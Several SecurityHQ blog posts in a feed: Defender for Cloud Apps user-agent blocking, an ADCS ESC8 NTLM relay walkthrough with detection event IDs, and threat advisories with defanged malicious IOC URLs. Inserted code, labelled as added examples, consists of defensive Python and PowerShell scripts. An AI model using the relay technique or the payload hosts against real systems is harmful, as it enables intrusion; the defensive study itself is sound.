  • Microsoft 365 E5 License: Required for Conditional Access App Control and MDCA session control
  • Microsoft Defender for Cloud Apps: Must be enabled
  • Admin Permissions: You must be an Admin or Security Admin in Entra ID (Azure AD)
  • Pilot Group: Recommended to test with a small group before full deployment

Step-by-Step Configuration

Enable Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps (MDCA) is a security tool that provides visibility and control over user sessions in SaaS applications. It acts as a reverse proxy when Conditional Access routes a user’s traffic through it.

  1. Go to Microsoft 365 Defender Portal
  2. Navigate to:
    Settings → Microsoft Defender for Cloud Apps → Connected Apps → Conditional Access App Control apps
  3. Ensure the Microsoft 365 apps are listed as shown below. If they are not, follow the steps in 3.2 below to create the Conditional Access policy that routes requests to Cloud Apps.
Fig. 3.1 Conditional Access App Control Apps

Create Conditional Access for Route Traffic to MDCA

Conditional Access App Control sends the session through the MDCA proxy where session inspection happens. This is the foundation for blocking based on the User-Agent string.

Go to Azure Portal → Microsoft Entra ID → Conditional Access

Click + New Policy

Configure the following settings:

Fig 3.2 Conditional Policy

Save and apply the policy.

Trigger MDCA Session Routing (App Detection)

After the CA policy is active, the user must log into the app (e.g., Outlook) to trigger MDCA to detect and begin monitoring the app.

  1. Open a private/incognito browser window.
  2. Visit Outlook or Teams.
  3. Log in with a test account.
  4. Wait 1–2 minutes.
  5. Go to: Cloud Apps → Settings → Connected Apps → Conditional Access App Control apps
  6. Confirm that apps such as Office 365, Teams, or Exchange appear as Monitored.

Note: If not detected, recheck your Conditional Access policy and retry in incognito mode.

Create MDCA Session Policy to Block Axios

This policy inspects live sessions and blocks any that match certain criteria — in this case, when the User-Agent string contains “axios”.

  1. In MDCA Portal → Control → Access policies → + Create policy
  2. Configure the following settings:

Click Create

This will block any Axios-based request to Office 365 apps.

Blocking malicious user agents is just one layer of a broader adaptive defense strategy. As attackers evolve, organizations must go beyond detection and adopt real-time controls that secure sessions, user identities, and cloud interactions.

Learn how to take your security strategy further with SecurityHQ’s Adaptive Defense Solutions, built to identify, contain, and respond to threats at every stage of the attack lifecycle.

The post Adaptive Defense: How Cloud App Policies Can Block Malicious User Agents appeared first on SecurityHQ.

]]>
Security Abuse of Misconfigured Active Directory Certificate Services Continue
https://www.securityhq.com/blog/security-abuse-of-misconfigured-active-directory-certificate-services-continue/ (Fri, 03 Jan 2025 12:05:04 +0000)

Active Directory Certificate Services (ADCS) is a role in Microsoft Windows Server that provides the infrastructure for public key infrastructure (PKI). It is used to create, manage, distribute, and revoke digital certificates. These certificates are used to secure communications, authenticate users or devices, and enforce security policies in an organization.

However, when misconfigured, ADCS can open doors for attackers to exploit weaknesses, leading to unauthorized access and privilege escalation.

How Can ADCS Become Vulnerable?

Unlike traditional threats, ADCS exploitation often begins with misconfigured certificate templates or weak HTTP-based enrollment methods. Once these are exploited, attackers can move laterally across the network, compromising critical systems and sensitive data.


Initially, the process begins with the client (user or computer) generating a public/private key pair. The client then sends a Certificate Signing Request (CSR) to the Certificate Authority (CA) server, which includes the public key and requested certificate details. The CA validates the request by checking if the certificate template settings permit the request, whether the certificate already exists, and if the client has the necessary permissions to enroll.

Figure 1: ADCS Client to Server Workflow, SecurityHQ

Upon successful validation, the CA uses its private key to sign and issue the certificate. The client stores the issued certificate in its Windows Certificate Store, enabling it to perform actions such as authentication, code signing, or secure communication as allowed by the certificate’s intended purpose.

Exploiting ESC8 – NTLM Relay Attack via AD CS Web Enrollment

Before exploring the exploitation of ESC8 (NTLM Relay Attack through AD CS Web Enrollment), it is important to understand how NTLM relay attacks work. NTLM relaying is a common attack used by threat actors to steal identities.

It works in two steps. First, it forces a victim to authenticate to a targeted endpoint. Second, it relays the authentication against a vulnerable target. By relaying the victim’s login details, attackers can log in and act as the victim. This helps them gain access to systems and potentially take over the network.

Figure 2: NTLM Relay Attack Flow, SecurityHQ

Active Directory Certificate Services (ADCS) provide an HTTP-based method for users and machines to enroll for certificates. When HTTP web enrollment is enabled, these methods are vulnerable and are often exploited through NTLM relay attacks. In such attacks, attackers impersonate authenticated users by relaying legitimate authentication requests to request certificates. This vulnerability can lead to full domain compromise.

The widespread use of HTTP-based enrollment further increases the risk of exploitation. Security researchers refer to this specific vulnerability or misconfiguration in ADCS as ADCS ESC8.

How Can ADCS ESC8 be Exploited in 6 Steps?

In this instance, the attacker first needs to enumerate the ADCS (HTTP) endpoint in the network, which can be done with tools such as certipy (a Python-based tool). Note that the attacker needs access to the domain, but the credentials of a simple low-privileged authenticated user are all that is needed to perform the attack.

Figure 3: ESC8 NTLM Relay Attack via ADCS Web Enrollment, SecurityHQ

  1. Once the vulnerable endpoint (ADS01) is identified, actors use an NTLM coercion method to initiate NTLM authentication from a domain controller. Event Detection Point: Look for Windows Event ID 4776, where you will see the logon event for the domain controller account (i.e. DC01$); the $ indicates that the authentication is initiated for the system account of the DC from the victim’s machine.
  2. The domain controller responds with the NTLM authentication, which the attacker relays from the victim’s machine to the vulnerable AD CS machine. This is achieved by setting up a relay on the attacker machine through tools such as ntlmrelayx.
  3. The URL “http://<Vulnerable_CA_Server>/certsrv/certfnsh.asp” is Microsoft’s Certificate Services web interface, used for certificate enrollment. The “certfnsh.asp” page is responsible for completing the certificate request process and delivering the issued certificate to the requestor. Event Detection Point: Look for network traffic on port 80 directed toward the ADCS server; specifically, you will observe a GET method here.
  4. The attacker requests a certificate for a domain controller; because it was a relayed request impersonating a legitimate source, ADCS issues a certificate for the requested domain controller (i.e. DC01.pfx). The obtained certificate is stored in the Windows certificate store. Event Detection Point: Look for Windows Event ID 4886, which is generated when a certificate is requested, and Windows Event ID 4887, which indicates that Certificate Services has approved a certificate request and issued a certificate to the requester.
  5. Using the generated certificate, attackers can impersonate the domain controller machine account and request a Kerberos TGT to authenticate as the domain controller. Event Detection Point: Windows Event ID 4768 will show the Kerberos authentication (TGT request) for the domain controller account (e.g., DC01$). Also look for network traffic on port 80 directed toward the ADCS server; specifically, you will observe the POST method here.
  6. Once these TGTs are received, the attackers can authenticate as the domain controller anywhere in the domain, as they hold the NT hash for the domain controller machine account, and can go on to perform a DCSync attack to retrieve all the domain hashes. Event Detection Point: Look for Windows Event ID 4662 for an indication of a DCSync attack.

Detect ADCS Abuse

To detect ADCS abuse, the following Windows event IDs need to be monitored:

  • Event ID 4776: The domain controller attempted to validate the credentials for an account. This event can be a valuable indicator for detecting Pass-the-Hash, as it is logged whenever a domain controller (DC) attempts to validate the credentials of an account using NTLM rather than Kerberos.
  • Event ID 4886: Certificate Services received a certificate request. Monitor this event ID for certificates requested for the domain controller.
  • Event ID 4887: Certificate Services approved a certificate request and issued a certificate. Monitor this event ID for ADCS issuing a certificate to the requestor.
  • Event ID 4768: A Kerberos authentication ticket (TGT) was requested. Monitor this event for a user or computer account attempting to authenticate to the domain and obtain access to resources.
  • Event ID 4662: An operation was performed on an object. Monitor this event ID for a DCSync attack, which allows attackers to steal credentials by using DsGetNCChanges requests.
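The six-step chain and the event IDs above, as an added example that is not part of the original post: a Python correlation that anchors on Event ID 4887 issued to a domain controller machine account and gathers the other stages for that account within a time window, run over constructed events. Host names, IPs, the domain and the DC inventory are assumptions; the event IDs, PKINIT pre-authentication type 16 and the replication-rights GUIDs are real values.

```python
from datetime import datetime, timedelta

# Constructed Windows security / CA events covering the six-step chain above.
# Field names follow the event XML (TargetUserName, Workstation, Requester,
# PreAuthType, SubjectUserName, Properties); values are made up.
SAMPLE_EVENTS = [
    # Step 1: NTLM validation of DC01$ coming from a workstation, not a DC.
    {"EventID": 4776, "Time": "2025-01-03T09:00:00", "TargetUserName": "DC01$",
     "Workstation": "WS-FINANCE-07", "Status": "0x0"},
    # Steps 3-4: web enrollment request and issuance for the DC machine account.
    {"EventID": 4886, "Time": "2025-01-03T09:00:02", "Requester": "CORP\\DC01$",
     "Attributes": "CertificateTemplate:Machine"},
    {"EventID": 4887, "Time": "2025-01-03T09:00:03", "Requester": "CORP\\DC01$",
     "Subject": "CN=DC01.corp.example", "Attributes": "CertificateTemplate:Machine"},
    # Step 5: TGT obtained with the certificate (PKINIT) from the workstation.
    {"EventID": 4768, "Time": "2025-01-03T09:01:10", "TargetUserName": "DC01$",
     "PreAuthType": "16", "IpAddress": "::ffff:10.20.30.77"},
    # Step 6: replication rights exercised by DC01$ (DCSync).
    {"EventID": 4662, "Time": "2025-01-03T09:02:30", "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Benign noise: a workstation renewing its own certificate and logging on normally.
    {"EventID": 4887, "Time": "2025-01-03T09:05:00", "Requester": "CORP\\WS01$",
     "Subject": "CN=WS01.corp.example", "Attributes": "CertificateTemplate:Machine"},
    {"EventID": 4768, "Time": "2025-01-03T09:05:20", "TargetUserName": "WS01$",
     "PreAuthType": "2", "IpAddress": "::ffff:10.20.30.15"},
]

DOMAIN_CONTROLLERS = {"DC01", "DC02"}   # constructed inventory of DC host names
WINDOW = timedelta(minutes=60)
PKINIT = "16"                            # PA-PK-AS-REQ: certificate-based pre-authentication
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # DS-Replication-Get-Changes-All


def account(name: str) -> str:
    """Normalise 'CORP\\DC01$' and 'dc01$' to 'DC01$'."""
    return name.split("\\")[-1].upper()


def parse_time(value: str) -> datetime:
    return datetime.fromisoformat(value)


def stage_of(event: dict, acct: str):
    """Map one event to a chain stage for the given machine account, or None."""
    eid = event["EventID"]
    if eid == 4776 and account(event["TargetUserName"]) == acct:
        # A DC's machine account being validated over NTLM from a non-DC host.
        if acct.rstrip("$") in DOMAIN_CONTROLLERS and \
                event["Workstation"].upper() not in DOMAIN_CONTROLLERS:
            return "ntlm_from_non_dc"
    if eid == 4887 and account(event["Requester"]) == acct:
        return "cert_issued"
    if eid == 4768 and account(event["TargetUserName"]) == acct \
            and event.get("PreAuthType") == PKINIT:
        return "pkinit_tgt"
    if eid == 4662 and account(event["SubjectUserName"]) == acct:
        if any(g in event.get("Properties", "").lower() for g in REPLICATION_GUIDS):
            return "dcsync"
    return None


def correlate(events: list) -> list:
    """Anchor on each certificate issued to a DC account (4887) and collect the
    other stages for that account inside WINDOW around the issuance."""
    findings = []
    for anchor in events:
        if anchor["EventID"] != 4887:
            continue
        acct = account(anchor["Requester"])
        if acct.rstrip("$") not in DOMAIN_CONTROLLERS:
            continue
        t_anchor = parse_time(anchor["Time"])
        stages = set()
        for ev in events:
            if abs(parse_time(ev["Time"]) - t_anchor) <= WINDOW:
                stage = stage_of(ev, acct)
                if stage:
                    stages.add(stage)
        # Issuance plus either the NTLM coercion or the PKINIT logon is the ESC8 pattern;
        # a DCSync on top of it means the domain hashes are already gone.
        if stages & {"ntlm_from_non_dc", "pkinit_tgt"}:
            findings.append({"account": acct, "stages": sorted(stages),
                             "severity": "critical" if "dcsync" in stages else "high"})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

A DC legitimately renewing its own certificate produces a 4887 for DC01$ but no NTLM validation from a workstation and no PKINIT logon from a non-DC address, so it does not fire.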

Mitigations and Next Steps

  1. Disable NTLM authentication on your Windows domain controllers and on any AD CS servers in your domain.
  2. Disable HTTP on AD CS servers (AD CS Web Enrollment).
  3. Enable Extended Protection for Authentication (EPA).
  4. Enable detailed logging of certificate requests and enrolments on the CA server.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

The post Security Abuse of Misconfigured Active Directory Certificate Services Continue appeared first on SecurityHQ.

]]>
December 2024 Threat Advisory – Top 5
https://www.securityhq.com/blog/december-2024-threat-advisory-top-5/ (Mon, 16 Dec 2024 14:06:24 +0000)

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of December 2024.

Two New Variants of Remcos RAT Identified in Recent Malware Campaigns

Threat Reference: Global

Risks: Malware

Advisory Type: Threats

Priority: Standard

The Remcos Remote Access Trojan (RAT) is a growing cybersecurity threat that primarily spreads through the use of phishing emails containing malicious attachments. Two new variants of the RAT have recently been uncovered. One variant is seen using VBS files to trigger hidden PowerShell scripts to download and execute malicious files. The second variant uses malicious attachments to exploit older vulnerabilities (CVE-2017-11882) in Microsoft Office to install the RAT.

Attack Scenario, Variant 1

1. The VBS file triggers an obfuscated PowerShell script on the victim’s system, which downloads malicious files (e.g., DLL01.txt, Entry.txt) from a command-and-control (C2) server via FTP server or Google Drive.

2. The PowerShell script checks the installed version, and once downloaded, the files are decoded, and the malicious payload is executed. The payload is injected into a legitimate system process, RegAsm.exe, a Microsoft .NET executable file.

3. The Remcos keylogger payload is loaded into memory, and the keylogger monitors the victim’s activity by logging all keystrokes.

4. The malware creates a registry entry under HKCU (HKEY_CURRENT_USER) Run for persistence and a misleading directory in AppData/Local/Microsoft\LocalLow to hide the malicious files from detection.

5. The captured data, including keystrokes, is stored in %ProgramData%\1210\logs.dat and exfiltrated to the C2 server. The malware maintains continuous communication with the C2 server, which can deliver payloads, receive stolen data, or issue commands to control the system.

Attack Scenario, Variant 2

1. This variant is delivered through a spam email with a malicious Office Open XML Document (.docx) file.

2. The document is an RTF file with a long filename, designed to trick the victim into opening it.

3. The document contains a reference to an external URL, which downloads an RTF file exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, allowing remote code execution.

4. The RTF file downloads a highly obfuscated VBS script. The payload includes a .NET DLL (dnlib.dll), which is loaded into memory via PowerShell without writing to disk to evade detection. After that, the Remcos RAT follows the usual malicious activities.

Indicators of compromise (IOCs). Domains/URLs:

  • dealc[.]me/NLizza
  • raw[.]githubusercontent[.]com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V[.]txt
  • 91[.]134[.]96[.]177/70/RGGFVC[.]txt
  • 91[.]134[.]96[.]177/70/picturewithmegetbacktouse[.]tIF

Recommendations

  1. Implement Multi-Factor Authentication to significantly reduce the risk of successful login attempts using stolen credentials.
  2. Deploy Endpoint Detection and Response (EDR) solutions to help identify and respond to suspicious activity, potentially stopping ransomware deployment.
  3. Regular data backups stored securely offline are essential for recovery in case of a ransomware attack.
  4. Prioritize and apply security patches promptly to address vulnerabilities that attackers can exploit.
  5. Educate employees to identify phishing attempts and other social engineering tactics used to gain initial access.
  6. Conduct regular security assessments to identify and address potential weaknesses in your IT infrastructure.

71 Vulnerabilities, Including 30 Remote Code Execution Flaws in Microsoft’s Dec Patch Tuesday

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for December 2024, addressing 71 security vulnerabilities, including one zero-day and 30 remote code execution vulnerabilities.

Successful exploitation of these vulnerabilities could lead to remote code execution, privilege escalation, security feature bypass, information disclosure, denial of service, and spoofing.

Affected products include Microsoft Office, Microsoft Edge, Microsoft Defender for Endpoint, Microsoft Office SharePoint, Microsoft Office Word, Windows Task Scheduler, Windows Resilient File System (ReFS), and GitHub.

Notable CVEs Include:

  • [Zero-Day] – CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege Vulnerability
  • [Critical] – CVE-2024-49115 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49116 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49117 – Windows Hyper-V Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49118 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49119 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49120 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49122 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49123 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49124 – Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49126 – Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49127 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49128 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49132 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49106 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49108 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49112 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

View the full list, here.

Recommendations

Update all affected products to the latest available patch version.

SecurityHQ Recommendation for Microsoft Default Teams External Access Hardening – Addendum

Threat Reference: Global

Risks: Threats

Advisory Type: Phishing, Spoofing, Ransomware

Priority: Standard

While this advisory revisits insights shared in November 2024, it reflects new campaign developments observed since October 2024, necessitating immediate review and enhancement of security settings.

SecurityHQ has observed a resurgence in targeted social engineering attacks exploiting Microsoft Teams’ external access settings. Threat actors such as Storm-1811 and Black Basta are leveraging these settings to initiate contact with victims, using display names like “Help Desk Manager” or impersonating internal IT staff. After gaining the victim’s trust, attackers manipulate them into downloading remote desktop tools such as AnyDesk, Quick Assist, or TeamViewer, enabling unauthorized system access and further malicious activity.

By default, Microsoft Teams allows external users to initiate chats and share files with corporate accounts. This configuration is exploited by these actors to execute sophisticated attacks.

Key Threat Actor Tactics

• Storm-1811

1. Initial Contact: Floods the victim’s inbox with spam (email bombing) to create urgency.

2. Impersonation: Poses as an IT administrator via Microsoft Teams or phone calls.

3. Exploitation: Guides users to install RMM tools and establishes SSH tunnel backdoors for persistence and reconnaissance.

• Black Basta

1. Initial Contact: Overloads inboxes with spam and follows up via Teams, impersonating IT staff.

2. Credential Harvesting: Deploys obfuscated malware (e.g., Zbot, DarkGate) and custom harvesters for rapid credential theft.

3. Payload Delivery: Uses compromised cloud services or direct uploads to deploy ransomware payloads.

Risk and Exploits

While Microsoft Teams requires users to accept chat requests before viewing messages from external accounts, this safeguard is easily bypassed through spoofed corporate accounts, urgent scenarios, and trusted source impersonation.

The SecurityHQ team has also added recently observed Indicators of Compromise (IOCs) related to the Abuse of Teams External Access Feature in an internal investigation.

Indicators of compromise (IOCs). IP Addresses:

Domains/URLs:


Recommendations

Kindly check whether your current Teams external access settings allow external users to initiate chat messages. It is highly recommended to restrict access for external users.

Step 1: Log in to the Microsoft Teams admin center.

Step 2: Go to the external access setting and scroll down.

Step 3: Uncheck “People in my org can communicate with Teams users whose accounts aren’t managed by an organization”.

Step 4: Click on save and confirm the changes.

Once you are done with changes, it will take some time to reflect changes
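The same check and change made from PowerShell, as an added example that is not part of the SecurityHQ post. It assumes the MicrosoftTeams module is installed and the account holds Teams administrator rights; the cmdlet and property names (Get-CsTenantFederationConfiguration, Set-CsTenantFederationConfiguration, AllowTeamsConsumer, AllowTeamsConsumerInbound, AllowFederatedUsers) are the module's own, and mapping AllowTeamsConsumer to the Step 3 checkbox is this example's reading of the setting.

```powershell
# Added example, not from the SecurityHQ post.
# Audits the Teams external access settings the admin-center steps above change,
# and optionally applies the hardening from PowerShell.
# Assumes: MicrosoftTeams module installed, Teams administrator account.
Import-Module MicrosoftTeams
Connect-MicrosoftTeams | Out-Null

function Get-TeamsExternalAccessState {
    # Returns the federation settings that back the admin-center checkboxes
    # together with a simple verdict on whether hardening is needed.
    $cfg = Get-CsTenantFederationConfiguration
    [pscustomobject]@{
        # "People in my org can communicate with Teams users whose accounts
        # aren't managed by an organization" (the Step 3 checkbox; assumption)
        AllowTeamsConsumer        = $cfg.AllowTeamsConsumer
        # Whether unmanaged Teams users may start the conversation themselves
        AllowTeamsConsumerInbound = $cfg.AllowTeamsConsumerInbound
        # Federation with other Microsoft 365 organisations (left untouched here)
        AllowFederatedUsers       = $cfg.AllowFederatedUsers
        NeedsHardening            = [bool]($cfg.AllowTeamsConsumer -or $cfg.AllowTeamsConsumerInbound)
    }
}

function Disable-TeamsConsumerAccess {
    # Equivalent of unchecking the Step 3 box and saving (Step 4).
    Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false -AllowTeamsConsumerInbound $false
    # Re-read so the caller sees the stored value, not the requested one.
    Get-TeamsExternalAccessState
}

$before = Get-TeamsExternalAccessState
$before | Format-List

if ($before.NeedsHardening) {
    $after = Disable-TeamsConsumerAccess
    Write-Host ("Unmanaged Teams consumer access now: {0} (inbound: {1}). " +
                "Allow time for the change to propagate.") -f $after.AllowTeamsConsumer, $after.AllowTeamsConsumerInbound
} else {
    Write-Host "Unmanaged Teams consumer access is already disabled."
}
```

Run the audit part alone first on a tenant you administer; AllowFederatedUsers is reported but not changed, because federation with other managed organisations is a separate decision from the unmanaged-account setting the post addresses.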

Ivanti Patched Multiple Critical and High-Severity Vulnerabilities

Threat Reference: Global

Risks: Arbitrary File Deletion, Unauthorized access, Remote code execution, Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that Ivanti has released patches for multiple high- and critical-severity vulnerabilities affecting several Ivanti products. Successful exploitation of these vulnerabilities may allow an attacker to perform arbitrary file deletion, gain unauthorized access, achieve remote code execution, or cause denial of service (DoS).

Affected Products include Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Policy Secure (IPS), Ivanti Connect Secure (ICS), Ivanti Sentry, Ivanti Endpoint Manager, Ivanti Security Controls, Ivanti Patch for Configuration Manager, Ivanti Neurons for Patch Management, and Ivanti Neurons Agent Platform.

Notable CVEs:

  • [Critical] CVE-2024-11633 – Argument injection in Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
  • [Critical] CVE-2024-11634 – Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
  • [Critical] CVE-2024-11639 – An authentication bypass in the admin web console of Ivanti CSA before version 5.0.3 allows a remote unauthenticated attacker to gain administrative access.
  • [Critical] CVE-2024-11772 – Command injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
  • [Critical] CVE-2024-11773 – SQL injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

SecurityHQ was not able to identify any evidence of these vulnerabilities being exploited in the wild, nor any association with an Advanced Persistent Threat (APT) group or malware variant.

Recommendation

Update all the affected products to the latest available patch version.

Adobe Released Security Updates to Address 161 Security Vulnerabilities Across Products with Critical and Important Severity

Threat Reference: Global

Risks: Cross-site Scripting (XSS), Stack-based and Heap-based Buffer Overflow, and Improper Input Validation.

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released patches addressing a total of 161 new security vulnerabilities across multiple Adobe products, of which 45 are rated critical and 116 important. These updates mitigate vulnerabilities that could allow attackers to perform cross-site scripting (XSS), trigger stack-based and heap-based buffer overflows, and abuse improper input validation.

Affected Products include Adobe Experience Manager (AEM), Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020, Adobe Media Encoder, Adobe After Effects, Adobe Animate 2023, Adobe Animate 2024, Adobe InDesign, Adobe PDFL Software Development Kit (SDK), Adobe Connect, Adobe Substance 3D Sampler, Photoshop 2025, Adobe Bridge, Adobe Premiere Pro, Adobe Substance 3D Painter, and Adobe FrameMaker.

Recommendation

Update all the affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post December 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

November 2024 Threat Advisory – Top 5 https://www.securityhq.com/blog/november-2024-threat-advisory-top-5/ Wed, 20 Nov 2024 12:55:45 +0000 https://www.securityhq.com/?p=11452 SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of November 2024.

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of November 2024.

The Emergence of Interlock Ransomware

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

SecurityHQ has identified the emergence of a new ransomware strain, Interlock. It targets Windows systems and is known for stealthy operation and a methodical approach to encrypting files. After gaining initial access through phishing emails containing malicious links, Interlock encrypts files, appends a specific extension to mark them as encrypted, and drops ransom notes threatening to expose sensitive information unless a ransom is paid, while employing a blend of evasion techniques to avoid detection.

Interlock ransomware is believed to have originated from a Russian-speaking cybercrime group. The attack vectors and deployment methods indicate that the threat actors behind Interlock are experienced and familiar with various ransomware distribution strategies. While the precise origins and initial release timeline remain unclear, the ransomware has been observed spreading in targeted campaigns against high-value organizations.

Affected systems and data include Windows operating systems, Microsoft Office documents, databases, and image files; targeted sectors include financial institutions, healthcare organizations, and government entities.

Recommendations:

SecurityHQ has identified several measures to reduce risk such as implementing Multi-Factor Authentication, deploying Endpoint Detection and Response solutions, regular data backups, addressing vulnerabilities, educating employees, and regular security assessments.

Adobe Released Security Updates to Patch Multiple Critical and Important Severity Vulnerabilities across Adobe Products

Threat Reference: Global

Risks: Arbitrary Code Execution, Memory Leak, Application Denial-of-Service

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released security updates to fix multiple critical severity vulnerabilities across its products. Successful exploitation of these vulnerabilities poses the risk of Memory Leak, Arbitrary Code Execution, and Application denial-of-service.

Affected products include Adobe After Effects, Adobe Substance 3D Painter, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, and Adobe Commerce.

Notable CVEs:

  • [Critical] CVE-2024-47441 – Out-of-bounds Write – A memory safety error in which data is written outside the bounds of its buffer. Such errors can lead to crashes or other unexpected behaviour and may allow an attacker to read sensitive information.
  • [Critical] CVE-2024-49521 – Server-Side Request Forgery (SSRF) – A web security vulnerability that allows an attacker to cause an application to make requests to an unintended destination.
  • [Critical] CVE-2024-49525 – Heap-based Buffer Overflow – Heap-based buffer overflows can be abused by threat actors to corrupt data and disrupt operations.

Recommendations:

Update all affected products to the latest available patch version.

Joint Agency Advisory: Increased Threat of Zero-Day Exploits Targeting Enterprise Vulnerabilities

Threat Reference: Global

Risks: Code Injection, Privilege Escalation, Heap-Based Buffer Overflow, SQL Injection, Remote Code Execution

Advisory Type: Updates/Patches

Priority: Standard

In a joint advisory published by NCSC, CISA, and allied agencies, experts warn of a surge in cyber attackers, including state-sponsored and financially motivated groups, exploiting zero-day vulnerabilities. Both newly disclosed and known vulnerabilities are being rapidly weaponized, making unpatched systems particularly vulnerable.

Agencies note a shift toward swift exploitation tactics and are advising organizations to bolster defenses by promptly patching and reducing their attack surfaces. Key industries such as government, finance, and critical infrastructure are primary targets.

Notable CVEs

  • CVE-2021-44228 (“Log4Shell”): RCE in Apache Log4j, widely exploited – Attackers submit crafted requests that cause the system to execute arbitrary code, allowing them to take full control of the system, steal information, launch ransomware, and more.

  • CVE-2019-0708 (“BlueKeep”): RCE in Windows RDP, critical impact – A security vulnerability in Windows operating systems that allows remote code execution, giving attackers full control over affected systems.

  • CVE-2020-1472 (“Zerologon”): Domain admin access in Microsoft Netlogon – Attackers gain access to systems via a brute-force attack against Netlogon, exploiting a flaw in which 1 in every 256 keys yields a ciphertext of only zeros.

Visit here for the full list.

Recommendations:

Update all the affected products to the latest available patch version.

Microsoft Released its November 2024 Patch Tuesday for 91 Flaws Including 4 Zero-Days and 52 Remote Code Execution Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Denial of Service and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for November 2024, with security updates for 91 flaws, including 4 actively exploited zero-days and 52 remote code execution vulnerabilities. Successful exploitation of these vulnerabilities could result in Elevation of Privilege, Security Feature Bypass, Remote Code Execution, Information Disclosure, Denial of Service, and Spoofing.

Affected Products include .NET and Visual Studio, Airlift.microsoft.com, Azure CycleCloud, LightGBM, Microsoft Defender for Endpoint, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Office Excel, Microsoft Office Word, Microsoft PC Manager, Microsoft Virtual Hard Drive, Microsoft Windows DNS, Role: Windows Active Directory Certificate Services, Role: Windows Hyper-V, SQL Server, TorchGeo, Visual Studio, Visual Studio Code, Windows CSC Service, Windows Defender Application Control (WDAC), Windows DWM Core library, Windows Kerberos, Windows Kernel, Windows NT OS Kernel, Windows NTLM, Windows Package Library Manager, Windows Registry, Windows Secure Kernel Mode, Windows SMB, Windows SMBv3 Client/Server, Windows Task Scheduler, Windows Telephony Service, Windows Update Stack, Windows USB Video Driver, Windows VMSwitch, and Windows Win32 Kernel Subsystem.

Notable CVEs:

  • [Zero-Day] – [Important] – CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability – Enables an attacker to authenticate as a user after only minimal interaction, such as the user opening a malicious file.
  • [Critical] – CVE-2024-43498 – .NET and Visual Studio Remote Code Execution Vulnerability – Attackers can exploit this by sending crafted requests to a vulnerable .NET web application, or by having a specially crafted file loaded into the application.
  • [Critical] – CVE-2024-43639 – Windows Kerberos Remote Code Execution Vulnerability – A critical vulnerability that allows attackers to send crafted requests to vulnerable systems, gain unauthorized access, and execute arbitrary code on affected systems.

